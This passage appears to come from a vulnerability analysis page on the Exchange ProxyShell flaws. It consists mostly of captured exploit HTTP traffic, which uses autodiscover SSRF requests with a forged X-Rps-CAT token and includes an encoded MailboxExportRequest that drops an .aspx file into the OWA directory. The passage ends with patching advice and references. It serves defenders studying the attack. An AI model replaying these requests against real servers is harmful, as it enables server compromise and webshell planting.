User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1814 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:DD7F4182-5BDD-4583-95B7-6ADA6915A0AE</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45">stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: dc68c921-f1c4-4f05-bafb-f9fb013f150b X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:44 GMT Content-Length: 2921 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:EB58C5D7-C871-43AB-922D-AC8B1410573C</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:DD7F4182-5BDD-4583-95B7-6ADA6915A0AE</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout" CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45">AAAAAAAAAVMAAAAAAAAAAAMAAATEAQAAAAQQBACRcqtkrXe/ToZ0tBT/b01Od66YR0OL3UOuN37K//eaRe+7vzxPYmogUmVmSWQ9IjAiPjxUTiBSZWZJZD0iMCI+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLk1haWxib3hSZXBsaWNhdGlvblNlcnZpY2UuTWFpbGJveEV4cG9ydFJlcXVlc3Q8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLk1haWxib3hSZXBsaWNhdGlvblNlcnZpY2UuUmVxdWVzdEJhc2U8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuQ29uZmlndXJhYmxlT2JqZWN0PC9UPjxUPlN5c3RlbS5PYmplY3Q8L1Q+PC9UTj48VG9TdHJpbmc+ZXhjaGcubGFuL1VzZXJzL3NtY2ludHlyZVxMUDBobHI3ZXRwNFo8L1RvU3RyaW5nPjxQcm9wcz48UyBOPSJGaWxlUGF0aCI+XFx3aW4tYnBpZDk1YWNxN2UuZXhjaGcubGFuXEMkXFByb2dyYW0gRmlsZXNcTWljcm9zb2Z0XEV4Y2hhbmdlIFNlcnZlclxWMTVcRnJvbnRFbmRcSHR0cFByb3h5XG93YVxhdXRoXDlDVEVvc3dUMi5hc3B4PC9TPjxTIE49Ik1haWxib3giPmV4Y2hnLmxhbi9Vc2Vycy9zbWNpbnR5cmU8L1M+PFMgTj0iTmFtZSI+TFAwaGxyN2V0cDRaPC9TPjxHIE49IlJlcXVlc3RHdWlkIj4yOGZhZTExZC1hZmQ0LTRmYWYtOTBjMS02MWQzNTQyYjc4MWE8L0c+PFMgTj0iUmVxdWVzdFF1ZXVlIj5NYWlsYm94IERhdGFiYXNlIDAyNjI5NDEzODU8L1M+PFMgTj0iRmxhZ3MiPkludHJhT3JnLCBQdXNoPC9TPjxOaWwgTj0iQmF0Y2hOYW1lIiAvPjxTIE49IlN0YXR1cyI+UXVldWVkPC9TPjxCIE49IlByb3RlY3QiPmZhbHNlPC9CPjxCIE49IlN1c3BlbmQiPmZhbHNlPC9CPjxTIE49IkRpcmVjdGlvbiI+UHVzaDwvUz48UyBOPSJSZXF1ZXN0U3R5bGUiPkludHJhT3JnPC9TPjxTIE49Ik9yZ2FuaXphdGlvbklkIj48L1M+PERUIE49IldoZW5DaGFuZ2VkIj4yMDIxLTA4LTE4VDE1OjE0OjQ1LjIxNDQ2OC0wNDowMDwvRFQ+PERUIE49IldoZW5DcmVhdGVkIj4yMDIxLTA4LTE4VDE1OjE0OjQ1LjIwNjQ4NjItMDQ6MDA8L0RUPjxEVCBOPSJXaGVuQ2hhbmdlZFVUQyI+MjAyMS0wOC0xOFQxOToxNDo0NS4yMTQ0NjhaPC9EVD48RFQgTj0iV2hlbkNyZWF0ZWRVVEMiPjIwMjEtMDgtMThUMTk6MTQ6NDUuMjA2NDg2Mlo8L0RUPjxTIE49IklkZW50aXR5Ij5leGNoZy5sYW4vVXNlcnMvc21jaW50eXJlXExQMGhscjdldHA0WjwvUz48QiBOPSJJc1ZhbGlkIj50cnVlPC9CPjxTIE49Ik9iamVjdFN0YXRlIj5OZXc8L1M+PC9Qcm9wcz48L09iaj4=</rsp:Stream><rsp:Stream Name="stdout" CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45">AAAAAAAAAVQAAAAAAAAAAAMAAABnAQAAAAYQBACRcqtkrXe/ToZ0tBT/b01Od66YR0OL3UOuN37K//eaRe+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlBpcGVsaW5lU3RhdGUiPjQ8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream><rsp:CommandState CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45" State="http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandState/Done"><rsp:ExitCode>0</rsp:ExitCode></rsp:CommandState></rsp:ReceiveResponse></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1768 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:13F33900-1D92-4CB3-B1C2-DCCC22698A1A</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Signal CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45"><rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code></rsp:Signal></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 885f91aa-4169-4c5a-91f0-d97f20a9f028 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:45 GMT Content-Length: 757 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/SignalResponse</a:Action><a:MessageID>uuid:F14BCB86-2E12-45E2-95F7-4B585866A238</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:13F33900-1D92-4CB3-B1C2-DCCC22698A1A</a:RelatesTo></s:Header><s:Body><rsp:SignalResponse/></s:Body></s:Envelope> #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 1592 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:BFA919EE-7BD0-47EB-B245-21E9A3007065</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body></env:Body></env:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/soap+xml;charset=UTF-8 Server: Microsoft-IIS/10.0 request-id: 984b942a-c6fa-478e-863f-edca7f281c1b X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:45 GMT Content-Length: 602 <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/DeleteResponse</a:Action><a:MessageID>uuid:DBA1754E-0BA9-40B6-BB47-EFA7B6C5FBAB</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:BFA919EE-7BD0-47EB-B245-21E9A3007065</a:RelatesTo></s:Header><s:Body></s:Body></s:Envelope>
Guidance
Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise. Organizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that future Exchange vulnerabilities can be patched on a zero-day (emergency) basis wherever possible. Note that this requires keeping current with quarterly Cumulative Updates, since Microsoft only releases security fixes for the most recent Cumulative Update versions.
References
- Orange Tsai blogs on ProxyShell
- Orange Tsai’s Black Hat slides
- Reproducing The ProxyShell Pwn2Own Exploit by PeterJson and Jang
- My Steps of Reproducing ProxyShell by Brandon Shi
- Rapid7 blog on ProxyShell
- Microsoft advisory on CVE-2021-34473
- Microsoft advisory on CVE-2021-34523
- Microsoft advisory on CVE-2021-31207
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: